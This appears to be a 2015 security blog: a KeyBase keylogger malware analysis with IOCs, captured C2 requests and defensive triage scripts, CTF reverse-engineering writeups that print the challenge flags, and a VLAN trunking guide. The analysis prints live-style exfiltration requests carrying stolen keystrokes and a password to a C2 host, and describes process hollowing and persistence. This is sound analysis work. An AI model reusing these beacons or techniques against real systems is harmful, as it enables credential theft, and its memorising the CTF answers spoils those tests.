Monday, October 12, 2015

Keybase Logger/Clipboard/CredsStealer campaign

While checking my email the other day I came across a phishing email that looked quite suspicious. See below:

It came with a compressed file named Product_details.gz. When extracted it contained a file named Payment_45476.scr. The .scr (screen saver) extension is only a disguise: the file is a Windows PE executable compiled for .NET, so it was opened in ILSpy to look at its inner workings.
- Looking at its main function, it creates two threads:

The function below uses a primitive form of obfuscation: strings are stored reversed and flipped back at run time.


The malware also carries an Encryption class that handles the decryption of several strings found throughout the code. The function below invokes the DecryptText method declared on that class:

The decrypted strings are the names of the Win32 APIs the malware resolves at run time:
  • CreateProcessA
  • GetThreadContext
  • SetThreadContext
  • Wow64SetThreadContext
  • ReadProcessMemory
  • WriteProcessMemory
  • NtUnmapViewOfSection
  • VirtualAllocEx
  • ResumeThread
Taken together this is the classic process-hollowing ("RunPE") import set: create a process suspended, unmap its image with NtUnmapViewOfSection, allocate and write the payload into it with VirtualAllocEx and WriteProcessMemory, point the main thread at the new entry point with GetThreadContext/SetThreadContext (Wow64SetThreadContext when the loader runs as a 64-bit process and the target is 32-bit), then ResumeThread. Finding this exact set behind encrypted strings in a .NET sample indicates it injects a payload into a freshly created process rather than running it in place.
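As an added example (not code from the post or from the sample), here is how the two observations above, reversed strings and the hollowing import set, can be turned into a quick triage check on a file: scan a blob for printable runs in both ASCII and UTF-16LE (the encoding .NET uses for user strings), reverse each, and see how much of the RunPE set the reversed strings cover. The bytes it scans are a constructed stand-in, not the real sample; the sample keeps its API names encrypted rather than merely reversed, so on the real file this check would run over the strings after DecryptText, not over the raw binary.

```python
import re

# The nine API names the sample decrypts at run time (from the ILSpy output above).
# Together they form the process-hollowing ("RunPE") sequence.
HOLLOWING_APIS = frozenset({
    "CreateProcessA", "GetThreadContext", "SetThreadContext", "Wow64SetThreadContext",
    "ReadProcessMemory", "WriteProcessMemory", "NtUnmapViewOfSection",
    "VirtualAllocEx", "ResumeThread",
})

ASCII_RUN = re.compile(rb"[\x20-\x7e]{5,}")
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){5,}")   # printable ASCII stored as UTF-16LE


def extract_strings(blob):
    """Yield (offset, encoding, text) for printable runs of 5+ characters.
    .NET user strings live in the #US heap as UTF-16LE, so scanning for ASCII
    only would miss most of what a C# sample contains."""
    for m in ASCII_RUN.finditer(blob):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in UTF16_RUN.finditer(blob):
        yield m.start(), "utf-16le", m.group().decode("utf-16le")


def find_reversed_apis(blob, known=HOLLOWING_APIS):
    """Map each string whose reversal is a known API name to that API name."""
    hits = {}
    for _offset, _enc, text in extract_strings(blob):
        if text[::-1] in known:
            hits[text] = text[::-1]
    return hits


def hollowing_coverage(api_names, required=HOLLOWING_APIS):
    """Return (found, missing). A complete set is a strong hollowing indicator;
    a partial one is worth a look but could be a legitimate injector or debugger."""
    found = frozenset(api_names) & required
    return found, required - found


def build_constructed_sample():
    """Constructed test input, not bytes from the real sample: the reversed API names as
    UTF-16LE user strings, one reversed name as ASCII, padding, and an unreversed decoy."""
    parts = [b"\x00" * 8]
    for name in sorted(HOLLOWING_APIS):
        parts.append(name[::-1].encode("utf-16le") + b"\x00\x00\x09")
    parts.append(b"\xff" + "VirtualAllocEx"[::-1].encode("ascii") + b"\x00")
    parts.append(b"LoadLibraryA\x00")   # stored forwards, so it must not be reported
    return b"".join(parts)


if __name__ == "__main__":
    hits = find_reversed_apis(build_constructed_sample())
    found, missing = hollowing_coverage(hits.values())
    print("reversed API strings:", hits)
    print("hollowing set complete" if not missing else "missing: %s" % sorted(missing))
```

On a real sample, feed `find_reversed_apis` the decrypted strings (or the raw file if the author only reversed them) and treat a full `hollowing_coverage` hit as a reason to watch for a suspended child process at run time.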
When the sample was executed its intent was clear. It establishes persistence by copying itself to %AllUsersProfile% (C:\ProgramData) as Important.exe and registering that copy under the HKCU Run key so it starts at logon; the name Important.exe is a static value set by the author. The dropped file has the same MD5 as the original sample, so it is a straight copy rather than a second stage, and the Run value name is a 32-character hex string that makes a handy hunting indicator. Registry and file activity:
 [CreateFile] Payment_45476.exe:1316 > %AllUsersProfile%\Important.exe     [MD5: 7c6a2697df26582b438c21ee7ce5b0b1]
 [RegSetValue] Payment_45476.exe:1316 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\50057d8e6fa9271dc2110b90bda7f871 = C:\ProgramData\Important.exe

The malware then starts beaconing to its C2 over plain HTTP. The request types show what it can do:

  • Takes a screenshot of the current window and uploads it.
  • Acts as a keylogger and credential stealer.
  • Captures clipboard content.

Everything it steals travels in the URL query string of a GET request, in clear text, so any proxy log carries the victim's machine name, window titles, keystrokes and harvested passwords verbatim:

 GET /wp-includes/css/keybase/post.php?type=notification&machinename=PETERPC&machinetime=11:58%20PM HTTP/1.1
 "steals passwords from the Chrome password store"
 GET /wp-includes/css/keybase/post.php?type=passwords&machinename=PETERPC&application=Chrome&link=http://gsl8411.ru.swtest.ru/ru-ru/user&username=polloloco&password=zi25XgKY HTTP/1.1
 "it has keylogging capabilities"
 GET /wp-includes/css/keybase/post.php?type=keystrokes&machinename=PETERPC&windowtitle=Filter&keystrokestyped=teststringt&machinetime=12:00%20AM HTTP/1.1
 "screenshot upload"
 POST /wp-includes/css/keybase/image/upload.php HTTP/1.1
 Content-Type: multipart/form-data; boundary=---------------------8d2d03db831e930
 Host: examgist.com
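The callbacks above make a good hunting signature precisely because everything rides in the query string. As an added example, not part of the original post, here is a small Python triage routine that classifies the request lines captured above (plus one constructed benign WordPress request) and pulls out the victim machine name and the leaked credentials, masking the password before it lands in a report.

```python
from urllib.parse import urlsplit, parse_qs

# Path fragment common to every callback captured above.
KEYBASE_MARKER = "/keybase/"


def parse_request_line(line):
    """Split 'METHOD /path?query HTTP/x.y' into (method, path, {param: value})."""
    method, target, _version = line.strip().split(" ", 2)
    parts = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return method, parts.path, query


def mask(secret, keep=2):
    """Keep a short prefix of a recovered password so it can be confirmed with the
    victim without writing the whole secret into a ticket."""
    if not secret:
        return None
    return secret[:keep] + "*" * (len(secret) - keep)


def classify_beacon(line):
    """Return a normalised event for a KeyBase callback, or None for unrelated requests."""
    method, path, q = parse_request_line(line)
    if KEYBASE_MARKER not in path:
        return None
    if method == "POST" and path.endswith("/image/upload.php"):
        return {"kind": "screenshot"}
    if method == "GET" and path.endswith("/post.php"):
        event = {"kind": q.get("type"), "machine": q.get("machinename")}
        if event["kind"] == "passwords":
            event.update(application=q.get("application"), site=q.get("link"),
                         username=q.get("username"), password=mask(q.get("password")))
        elif event["kind"] == "keystrokes":
            event.update(window=q.get("windowtitle"), keys=q.get("keystrokestyped"))
        return event
    return None


def triage(lines):
    """Run classify_beacon over request lines; return (events, sorted victim machine names)."""
    events = [e for e in (classify_beacon(l) for l in lines if l.strip()) if e]
    machines = sorted({e["machine"] for e in events if e.get("machine")})
    return events, machines


# The four request lines captured above, plus one constructed benign WordPress request.
SAMPLE_REQUESTS = [
    "GET /wp-includes/css/keybase/post.php?type=notification&machinename=PETERPC&machinetime=11:58%20PM HTTP/1.1",
    "GET /wp-includes/css/keybase/post.php?type=passwords&machinename=PETERPC&application=Chrome&link=http://gsl8411.ru.swtest.ru/ru-ru/user&username=polloloco&password=zi25XgKY HTTP/1.1",
    "GET /wp-includes/css/keybase/post.php?type=keystrokes&machinename=PETERPC&windowtitle=Filter&keystrokestyped=teststringt&machinetime=12:00%20AM HTTP/1.1",
    "POST /wp-includes/css/keybase/image/upload.php HTTP/1.1",
    "GET /wp-includes/css/dist/block-library/style.min.css HTTP/1.1",   # constructed, benign
]

if __name__ == "__main__":
    events, machines = triage(SAMPLE_REQUESTS)
    print("victims:", machines)
    for event in events:
        print(event)
```

The same logic ports directly to a proxy or IDS rule: match the `/keybase/post.php` path with a `type=` parameter of `notification`, `passwords` or `keystrokes`, and raise the priority when the `password=` parameter is present.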

Looking further at the C2 callbacks, the directory the screenshots are uploaded to was world readable, so anyone who found the server could browse the victims' screens. See sample below:

The login panel was also available :

In conclusion, this malware is primitive in design, but it can certainly cause damage: its keylogging, screenshot and credential-stealing capabilities make it very attractive to script kiddies. Thank you for reading.


MD5:
7c6a2697df26582b438c21ee7ce5b0b1  Payment_45476.scr
398af2fd86ce37d6d3052eb7503b2790  Order_25464.scr
78c4256eb2003db620a45adba44f404c  Order_34002.gz
9dada7b67f5066e6f5d394222240beb9  Product_details.gz

C2:
http://examgist[.]com/wp-includes/css/keybase/login.php


VT:
https://www.virustotal.com/en/file/2d1009dbaecc2f0dd543adb812d55726656843ea1a66058059eb3fbd088b2a5c/analysis/


Sunday, September 27, 2015

Flare Challenge 1

This was my first time playing the Flare-On challenge and I wanted to see how much fun it was, so I grabbed the first challenge. It comes as a file named Flare-On_start_2015.exe; running it drops an additional file named i_am_happy_you_are_to_playing_the_flareon_challenge.exe. So let's begin:

- First I wanted to know what type of file it was, so I ran the file command against it:
 ubuntu@nu11byt3s:/mnt/malware-repo/flare$ file i_am_happy_you_are_to_playing_the_flareon_challenge.exe
 i_am_happy_you_are_to_playing_the_flareon_challenge.exe: PE32 executable (console) Intel 80386, for MS Windows

- Good, it is a 32-bit Windows console binary. So I ran it to see what it looks like:

- The binary asks for input and checks it, presumably against a key. Let's open it in IDA Pro and see what it looks like in there:

- The section above is the part of the program that processes the input. After the call to ReadFile the input sits at byte_402158. The next instruction, xor ecx, ecx, zeroes the counter, and after it comes what looks like an encoding loop. Let's take a closer look:
Looking at loc_40104D, the program loads one byte from byte_402158[ecx] into AL, XORs it with 0x7D and compares the result against the byte at byte_402140[ecx]. If they match it increments ecx, checks whether ecx has reached 24 (0x18) and, if not, goes back to the top of the loop; once all 24 bytes have matched it falls through to the section that prints "you are success". So the expected key is stored XOR-encoded with 0x7D at byte_402140, and the check bails on the first mismatch.

After this analysis I opened the binary in Immunity Debugger and placed a breakpoint on the XOR described above. With "AAAA" entered as input, I located the key by right-clicking the [ECX+402140] operand of the CMP below and choosing Follow in Dump -> Address constant:
 00401055 |. 3A81 40214000 |CMP AL,BYTE PTR DS:[ECX+402140]

This shows the location where the encoded key resides, alongside our own input. As we can see, the encoded key covers 24 bytes starting at address 00402140 (00402140 through 00402157). I then wrote an Immunity Debugger PyCommand to recover the key. I called it myplugin; it takes two parameters, the start address of the key and the end address (exclusive, so 402140 and 402158 here). Source code below:
 #!/usr/bin/python
 # Immunity Debugger PyCommand (Python 2): !myplugin <startaddr> <endaddr>
 # Reads the XOR-encoded key out of process memory and decodes it with the
 # 0x7D constant seen in the CMP loop.
 import immlib

 XOR_KEY = 0x7d

 def usage(imm):
     imm.log("Usage: !myplugin [startingaddr] [endingaddr]  (hex, end address exclusive)")

 def main(args):
     imm = immlib.Debugger()
     if len(args) < 2:
         usage(imm)
         return "missing arguments"
     startingAddr = int(args[0], 16)
     endingAddr = int(args[1], 16)
     if endingAddr <= startingAddr:
         usage(imm)
         return "end address must be above start address"
     # Read the whole range in one call, then XOR it byte by byte
     encoded = imm.readMemory(startingAddr, endingAddr - startingAddr)
     key = "".join(chr(ord(c) ^ XOR_KEY) for c in encoded)
     imm.log("key is %s" % key)
     return "key was found ^_^"
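The same decode can be done offline once the 24 bytes at 402140 have been copied out of the dump. The Python below is an added example, not the author's plugin: besides the XOR decode and a mirror of the comparison loop, it shows how to recover the key byte by known plaintext if the constant were not sitting in the disassembly. The encoded table is constructed from a placeholder string, not the real key, and the assumption that Flare-On flags end in "@flare-on.com" is mine.

```python
XOR_KEY = 0x7D      # constant from the XOR at loc_40104D
KEY_LEN = 24        # loop runs until ecx == 0x18


def decode_key(encoded, key=XOR_KEY):
    """Undo the byte-wise XOR the binary applies before its CMP against byte_402140."""
    return bytes(b ^ key for b in encoded).decode("ascii")


def check_input(user_input, encoded, key=XOR_KEY):
    """Mirror of the loop at loc_40104D: XOR each input byte with key, compare it with the
    table entry, stop at the first mismatch, succeed only after KEY_LEN matches."""
    data = user_input.encode("ascii")
    for i in range(KEY_LEN):
        if i >= len(data) or (data[i] ^ key) != encoded[i]:
            return False
    return True


def recover_xor_key(encoded, known_plaintext, at_end=True):
    """Single-byte XOR key recovery by known plaintext. Every byte of the known fragment
    must agree on the same key; if they disagree there is no single-byte key and None
    is returned."""
    kp = known_plaintext.encode("ascii")
    window = encoded[-len(kp):] if at_end else encoded[:len(kp)]
    candidates = {c ^ p for c, p in zip(window, kp)}
    return candidates.pop() if len(candidates) == 1 else None


# Constructed stand-in for the 24 bytes at 0x402140; the real table is not reproduced here.
PLACEHOLDER_FLAG = "placeholder@flare-on.com"
ENCODED_TABLE = bytes(ord(c) ^ XOR_KEY for c in PLACEHOLDER_FLAG)

if __name__ == "__main__":
    key = recover_xor_key(ENCODED_TABLE, "@flare-on.com")
    print("recovered key byte: 0x%02X" % key)
    print("decoded:", decode_key(ENCODED_TABLE, key))
    print("check 'AAAA':", check_input("AAAA", ENCODED_TABLE, key))
```

Because the loop stops on the first mismatching byte, the check is not constant time; with a debugger breakpoint on the CMP (or a timing oracle, on a longer key) the key could also be recovered one byte at a time without ever reading the table.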


Thank you for reading and see you next time. 


Thursday, September 10, 2015

How to Configure Vlan trunking between Cisco switch and ESX host

This post gives step-by-step instructions for setting up VLAN trunking between a Cisco switch and an ESXi host. Let's begin:

Device list:
Cisco Catalyst 3560 switch
VMware ESXi 5.5.0

- Simple network diagram below:

- First we configure the Cisco switch. The commands used are below:

interface FastEthernet0/7
 description link to trunk to esx vswitch 
 switchport trunk encapsulation dot1q
 switchport trunk allowed vlan 10
 switchport mode trunk
 switchport nonegotiate
 no cdp enable
 spanning-tree portfast trunk
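As an added example, not part of the original post, the Python below audits trunk ports in an IOS running-config against the points that matter on a lab trunk: DTP left negotiable, no allowed-VLAN list, and the native VLAN left at its default. It is run over the FastEthernet0/7 stanza above and over a constructed weaker configuration (FastEthernet0/8 and 0/9 are made up for the example).

```python
def parse_interfaces(config):
    """Group an IOS running-config into {interface name: [sub-commands]}.
    Sub-commands are the indented lines that follow an 'interface' line."""
    interfaces, current = {}, None
    for raw in config.splitlines():
        if not raw.strip() or raw.startswith("!"):
            current = None
            continue
        if raw.startswith("interface "):
            current = raw.split(None, 1)[1].strip()
            interfaces[current] = []
        elif current is not None and raw[0].isspace():
            interfaces[current].append(raw.strip())
        else:
            current = None          # some other global command ends the stanza
    return interfaces


def audit_trunk(cmds):
    """Findings for one interface; empty when nothing is wrong or it is not a switchport."""
    if not any(c.startswith("switchport") for c in cmds):
        return []                   # routed port, SVI or similar: out of scope
    mode = next((c.split()[2] for c in cmds if c.startswith("switchport mode ")), None)
    if mode == "access":
        return []
    findings = []
    if mode is None:
        # Catalyst default is 'dynamic auto': the port trunks if the neighbour asks
        findings.append("NO-EXPLICIT-MODE")
    elif mode == "dynamic":
        # 'dynamic desirable/auto' trunks with anything that speaks DTP, which is
        # the switch-spoofing VLAN-hopping setup
        findings.append("DTP-NEGOTIATED")
    elif mode == "trunk" and "switchport nonegotiate" not in cmds:
        findings.append("DTP-ENABLED")      # static trunk, but still sends DTP frames
    if not any(c.startswith("switchport trunk allowed vlan ") for c in cmds):
        findings.append("ALL-VLANS-ALLOWED")
    if not any(c.startswith("switchport trunk native vlan ") for c in cmds):
        findings.append("NATIVE-VLAN-DEFAULT")  # untagged frames land in VLAN 1
    return findings


def audit_config(config):
    """Return {interface: findings} for every interface with at least one finding."""
    results = {}
    for name, cmds in parse_interfaces(config).items():
        findings = audit_trunk(cmds)
        if findings:
            results[name] = findings
    return results


# The switch configuration from the post.
PAGE_CONFIG = """
interface FastEthernet0/7
 description link to trunk to esx vswitch
 switchport trunk encapsulation dot1q
 switchport trunk allowed vlan 10
 switchport mode trunk
 switchport nonegotiate
 no cdp enable
 spanning-tree portfast trunk
"""

# Constructed counter-example: a negotiable trunk carrying every VLAN, and an access port.
WEAK_CONFIG = """
interface FastEthernet0/8
 description constructed example of a weak trunk
 switchport trunk encapsulation dot1q
 switchport mode dynamic desirable
!
interface FastEthernet0/9
 switchport mode access
 switchport access vlan 10
"""

if __name__ == "__main__":
    print(audit_config(PAGE_CONFIG))
    print(audit_config(WEAK_CONFIG))
```

Run against `show running-config` output, the only thing it flags on the post's own port is the default native VLAN; the constructed FastEthernet0/8 shows what an unhardened trunk looks like by comparison.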

Two things are worth noting on the switch side. switchport nonegotiate turns DTP off, so the port will not negotiate a trunk with whatever gets plugged into it, and switchport trunk allowed vlan 10 prunes every other VLAN off the link, so the ESXi host only ever sees VLAN 10. The native VLAN is left at its default of VLAN 1, which means untagged frames on this trunk land in VLAN 1; for a malware lab it is worth moving the native VLAN to an unused one with switchport trunk native vlan.

- Second is the ESXi side. First we need to create a vSwitch: in the ESX management console go to the Networking tab, click Add Networking and choose Virtual Machine as the connection type.

- The next screen lets you create the vSwitch. Create a new vSwitch and choose the NIC it will use; in this example that is vmnic1. Then click Next.

- On the screen above a vSwitch named Malware-lab was created. The second field, VLAN ID, is where the VLAN number goes, in this case 10. It is a property of the port group and makes the vSwitch tag that port group's frames with VLAN 10, matching the allowed VLAN on the switch trunk. Once the settings are saved, ping between the endpoints and they should be able to communicate.

Monday, September 7, 2015

MMA CTF "howtouse" "cannotberun" challenge writeup

howtouse challenge:

- Looking at the file, it is a Windows DLL. Its export table contains one interesting export that gives us a lead: fnhowtouse(int).
- I loaded the DLL in OllyDbg and called the export with a parameter of 1. Near the beginning of its execution I noticed a series of MOV operations referencing the memory region below, which looked suspicious:

CPU Dump
Address   Hex dump                                         ASCII
71061000  B8 01 00 00|00 C2 0C 00|CC CC CC CC|CC CC CC CC| ¸   Â ÌÌÌÌÌÌÌÌ
71061010  B8 61 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸a   ÃÌÌÌÌÌÌÌÌÌÌ
71061020  B8 62 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸b   ÃÌÌÌÌÌÌÌÌÌÌ
71061030  B8 63 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸c   ÃÌÌÌÌÌÌÌÌÌÌ
71061040  B8 64 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸d   ÃÌÌÌÌÌÌÌÌÌÌ
71061050  B8 65 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸e   ÃÌÌÌÌÌÌÌÌÌÌ
71061060  B8 66 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸f   ÃÌÌÌÌÌÌÌÌÌÌ
71061070  B8 41 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸A   ÃÌÌÌÌÌÌÌÌÌÌ
71061080  B8 4D 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸M   ÃÌÌÌÌÌÌÌÌÌÌ
71061090  B8 30 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸0   ÃÌÌÌÌÌÌÌÌÌÌ
710610A0  B8 31 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸1   ÃÌÌÌÌÌÌÌÌÌÌ
710610B0  B8 32 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸2   ÃÌÌÌÌÌÌÌÌÌÌ
710610C0  B8 33 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸3   ÃÌÌÌÌÌÌÌÌÌÌ
710610D0  B8 34 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸4   ÃÌÌÌÌÌÌÌÌÌÌ
710610E0  B8 37 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸7   ÃÌÌÌÌÌÌÌÌÌÌ
710610F0  B8 38 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸8   ÃÌÌÌÌÌÌÌÌÌÌ
71061100  B8 39 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸9   ÃÌÌÌÌÌÌÌÌÌÌ
71061110  B8 7B 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸{   ÃÌÌÌÌÌÌÌÌÌÌ
71061120  B8 7D 00 00|00 C3 CC CC|CC CC CC CC|CC CC        ¸}   ÃÌÌÌÌÌÌÌÌ

- There is a clear pattern in the region above: every 16-byte slot holds B8 <imm32> C3, that is mov eax, <char> ; ret, a tiny stub that returns one ASCII character (the first slot, mov eax,1 ; ret 0Ch, is a stdcall function returning 1 rather than a character stub). The characters available (0-9, a-f, A, M, { and }) are exactly what a flag of the form MMA{hex} needs, so I figured these stubs would be used to build the key later on.

- Following the execution, the region above is indeed used to build the key. I put a breakpoint on the following instruction, which stores the last stub pointer, and waited for the program to hit it:

CPU Disasm
Address   Hex dump          Command                                  Comments
71061276  |.  C78424 B40000 MOV DWORD PTR SS:[LOCAL.0],71061120      ; Entry point


Once the breakpoint hit I looked at the memory at LOCAL.0. It is an array of pointers into the stub region above, one per character of the key, with the last entry pointing at the '}' stub:

CPU Dump
Address   Hex dump                                         ASCII
0012FE90  80 10 06 71|80 10 06 71|70 10 06 71|10 11 06 71| € q€ qp q q
0012FEA0  60 10 06 71|30 10 06 71|E0 10 06 71|40 10 06 71| ` q0 qà q@ q
0012FEB0  00 11 06 71|90 10 06 71|30 10 06 71|10 10 06 71|   q q0 q q
0012FEC0  90 10 06 71|90 10 06 71|A0 10 06 71|60 10 06 71|  q q q` q
0012FED0  30 10 06 71|F0 10 06 71|E0 10 06 71|A0 10 06 71| 0 qð qà q q
0012FEE0  B0 10 06 71|D0 10 06 71|00 11 06 71|E0 10 06 71| ° qÐ q qà q
0012FEF0  40 10 06 71|F0 10 06 71|F0 10 06 71|40 10 06 71| @ qð qð q@ q
0012FF00  00 11 06 71|50 10 06 71|50 10 06 71|E0 10 06 71|   qP qP qà q
0012FF10  50 10 06 71|60 10 06 71|10 10 06 71|00 11 06 71| P q` q q q
0012FF20  50 10 06 71|00 11 06 71|20 10 06 71|C0 10 06 71| P q q qÀ q
0012FF30  B0 10 06 71|50 10 06 71|40 10 06 71|F0 10 06 71| ° qP q@ qð q
0012FF40  20 11 06 71|                                       q

All that is left is to resolve each pointer to its stub and read the character out of the mov, one by one, until the key is revealed.
key: MMA{fc7d90ca001fc8712497d88d9ee7efa9e9b32ed8}
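The decode can be done straight from the two dumps above without stepping through the loop. The Python below is an added example, not the author's tooling: it parses the hex columns of both OllyDbg listings (reproduced from the dumps above with the ASCII column dropped), resolves each pointer in the LOCAL.0 array to its stub, and reads the imm32 of the mov eax, which reproduces the key.

```python
import re
import struct

# Hex columns of the 'CPU Dump' listings above (ASCII column dropped).
STUB_DUMP = """
71061000  B8 01 00 00|00 C2 0C 00|CC CC CC CC|CC CC CC CC|
71061010  B8 61 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC|
71061020  B8 62 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC|
71061030  B8 63 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC|
71061040  B8 64 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC|
71061050  B8 65 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC|
71061060  B8 66 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC|
71061070  B8 41 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC|
71061080  B8 4D 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC|
71061090  B8 30 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC|
710610A0  B8 31 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC|
710610B0  B8 32 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC|
710610C0  B8 33 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC|
710610D0  B8 34 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC|
710610E0  B8 37 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC|
710610F0  B8 38 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC|
71061100  B8 39 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC|
71061110  B8 7B 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC|
71061120  B8 7D 00 00|00 C3 CC CC|CC CC CC CC|CC CC
"""

PTR_DUMP = """
0012FE90  80 10 06 71|80 10 06 71|70 10 06 71|10 11 06 71|
0012FEA0  60 10 06 71|30 10 06 71|E0 10 06 71|40 10 06 71|
0012FEB0  00 11 06 71|90 10 06 71|30 10 06 71|10 10 06 71|
0012FEC0  90 10 06 71|90 10 06 71|A0 10 06 71|60 10 06 71|
0012FED0  30 10 06 71|F0 10 06 71|E0 10 06 71|A0 10 06 71|
0012FEE0  B0 10 06 71|D0 10 06 71|00 11 06 71|E0 10 06 71|
0012FEF0  40 10 06 71|F0 10 06 71|F0 10 06 71|40 10 06 71|
0012FF00  00 11 06 71|50 10 06 71|50 10 06 71|E0 10 06 71|
0012FF10  50 10 06 71|60 10 06 71|10 10 06 71|00 11 06 71|
0012FF20  50 10 06 71|00 11 06 71|20 10 06 71|C0 10 06 71|
0012FF30  B0 10 06 71|50 10 06 71|40 10 06 71|F0 10 06 71|
0012FF40  20 11 06 71|
"""

# address, then hex byte pairs separated by spaces or the column bars OllyDbg prints
DUMP_LINE = re.compile(r"^\s*([0-9A-Fa-f]{8})\s+((?:[0-9A-Fa-f]{2}(?:[ |]+|$))+)")


def parse_dump(text):
    """Turn an OllyDbg 'CPU Dump' listing into {address: byte}."""
    mem = {}
    for line in text.splitlines():
        m = DUMP_LINE.match(line)
        if not m:
            continue
        base = int(m.group(1), 16)
        data = bytes.fromhex(re.sub(r"[^0-9A-Fa-f]", "", m.group(2)))
        for i, b in enumerate(data):
            mem[base + i] = b
    return mem


def dwords(mem):
    """Little-endian dwords from a contiguous {address: byte} map, lowest address first."""
    blob = bytes(mem[a] for a in sorted(mem))
    return [struct.unpack_from("<I", blob, off)[0] for off in range(0, len(blob) - 3, 4)]


def stub_char(mem, addr):
    """If addr holds 'B8 imm32 C3' (mov eax, imm32 ; ret) return chr(imm32), else None.
    The slot at 71061000 is 'mov eax,1 ; ret 0Ch', so it is rejected by the C3 check."""
    if mem.get(addr) != 0xB8 or mem.get(addr + 5) != 0xC3:
        return None
    try:
        imm = struct.unpack("<I", bytes(mem[addr + 1 + i] for i in range(4)))[0]
    except KeyError:
        return None
    return chr(imm)


def decode_key(stub_text=STUB_DUMP, ptr_text=PTR_DUMP):
    """Resolve every pointer in the LOCAL.0 array to its stub and concatenate the characters."""
    stubs = parse_dump(stub_text)
    out = []
    for p in dwords(parse_dump(ptr_text)):
        c = stub_char(stubs, p)
        if c is None:
            raise ValueError("0x%08X is not a 'mov eax, imm32 ; ret' stub" % p)
        out.append(c)
    return "".join(out)


if __name__ == "__main__":
    print(decode_key())
```

The same approach works for any "table of function pointers that each return a constant" construction: recover the constant per callee statically, then walk the table in the order the program fills it.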



"cannotberun" challenge: this one was about fixing a corrupted PE header. Once the header was fixed, just run the program and it prints the key.

key: MMA{7a35hxb9q81fsg6}